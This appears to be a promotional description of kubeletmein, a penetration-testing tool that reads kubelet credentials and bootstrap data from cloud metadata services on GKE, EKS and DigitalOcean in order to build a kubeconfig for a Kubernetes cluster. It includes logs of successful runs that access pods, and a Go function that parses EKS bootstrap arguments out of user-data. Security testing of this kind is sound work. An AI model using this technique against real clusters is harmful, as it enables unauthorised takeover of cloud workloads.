Kubeletmein is a simple pentest tool that exploits cloud-specific threats to a Kubernetes cluster in order to gain access to the k8s API.
This access can be used to take further control of applications running in the cloud or, in many other cases, to facilitate complete control of Kubernetes.
Supported providers and use
GKE
GKE (Google Kubernetes Engine) is fully supported and relies on metadata concealment being disabled.
EKS
Support for Amazon Elastic Kubernetes Service was originally added by @airman604, based on the AWS EKS startup script. This was extended to provide support for the various types of user data encountered on EKS.
Specifically, it will support cloud-config and shell script formats. In the latter case, the program tries to parse the /etc/eks/bootstrap.sh command line arguments and retrieve the values needed from there.
~ $ kubeletmein generate
2021-03-02T21:37:59Z [ℹ] running autodetect
2021-03-02T21:37:59Z [ℹ] EKS detected
2021-03-02T21:37:59Z [ℹ] fetching cluster information from user-data from the metadata service
2021-03-02T21:37:59Z [ℹ] getting IMDSv2 token
2021-03-02T21:37:59Z [ℹ] getting user-data
2021-03-02T21:37:59Z [ℹ] generating EKS node kubeconfig file at: kubeconfig
2021-03-02T21:37:59Z [ℹ] wrote kubeconfig
2021-03-02T21:37:59Z [ℹ] then try: kubectl --kubeconfig kubeconfig get pods
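The shell-script case described above, as an added example that is not kubeletmein's own code: it extracts the /etc/eks/bootstrap.sh arguments from user-data, which is a quick way to review what a node's user-data discloses to anything able to read it from the metadata service. The function name, the sample values and the "one value per option" layout are assumptions made for the illustration.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Constructed sample of shell-format EKS user-data (all values are made up).
const sampleUserData = `#!/bin/bash
/etc/eks/bootstrap.sh demo-cluster \
  --apiserver-endpoint 'https://EXAMPLE.eks.invalid' \
  --b64-cluster-ca 'Q09OU1RSVUNURUQ=' \
  --kubelet-extra-args '--node-labels=team=demo --max-pods=17'
`

// tokenRE matches a double-quoted, single-quoted or bare shell word.
var tokenRE = regexp.MustCompile(`"([^"]*)"|'([^']*)'|(\S+)`)

// ExposedBootstrapArgs (hypothetical helper) returns the cluster name and option
// values passed to bootstrap.sh. Assumption: each --option takes exactly one value.
func ExposedBootstrapArgs(userData string) (cluster string, opts map[string]string) {
	opts = map[string]string{}
	joined := strings.ReplaceAll(userData, "\\\n", " ") // undo line continuations
	for _, line := range strings.Split(joined, "\n") {
		i := strings.Index(line, "/etc/eks/bootstrap.sh")
		if i < 0 || strings.HasPrefix(strings.TrimSpace(line), "#") {
			continue // not the bootstrap call, or a commented-out one
		}
		var toks []string
		for _, m := range tokenRE.FindAllStringSubmatch(line[i:], -1) {
			toks = append(toks, m[1]+m[2]+m[3]) // only one group is non-empty
		}
		for j := 1; j < len(toks); j++ { // toks[0] is the script path
			if strings.HasPrefix(toks[j], "--") && j+1 < len(toks) {
				opts[toks[j]] = toks[j+1]
				j++
			} else if cluster == "" {
				cluster = toks[j]
			}
		}
	}
	return cluster, opts
}

func main() {
	cluster, opts := ExposedBootstrapArgs(sampleUserData)
	fmt.Printf("cluster=%s endpoint=%s ca=%s\n", cluster, opts["--apiserver-endpoint"], opts["--b64-cluster-ca"])
}
```

Every value the function returns for a real launch template is readable by any workload that can reach the node's metadata service, so the output doubles as a list of what restricting metadata access protects.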
DigitalOcean
Supported by default: DO provides kubelet credentials through the metadata service, and this cannot be disabled.
root@kubeletmein-vulnerable:/# kubeletmein generate
2021-03-04T23:39:46Z [ℹ] running autodetect
2021-03-04T23:39:46Z [ℹ] DigitalOcean detected
2021-03-04T23:39:46Z [ℹ] fetching kubelet creds from metadata service
2021-03-04T23:39:46Z [ℹ] writing ca cert to: ca-CERTIFICATES.crt
2021-03-04T23:39:46Z [ℹ] generating bootstrap-kubeconfig file at: bootstrap-kubeconfig
2021-03-04T23:39:46Z [ℹ] wrote bootstrap-kubeconfig
2021-03-04T23:39:46Z [ℹ] using bootstrap-config to request new cert for node: kubeletmein-node
2021-03-04T23:39:46Z [ℹ] got new cert and wrote kubeconfig
2021-03-04T23:39:46Z [ℹ] now try: kubectl --kubeconfig kubeconfig get pods
root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get pods
NAME                     READY   STATUS    RESTARTS   AGE
kubeletmein-vulnerable   1/1     Running   0          6m12s
You can download the program from here.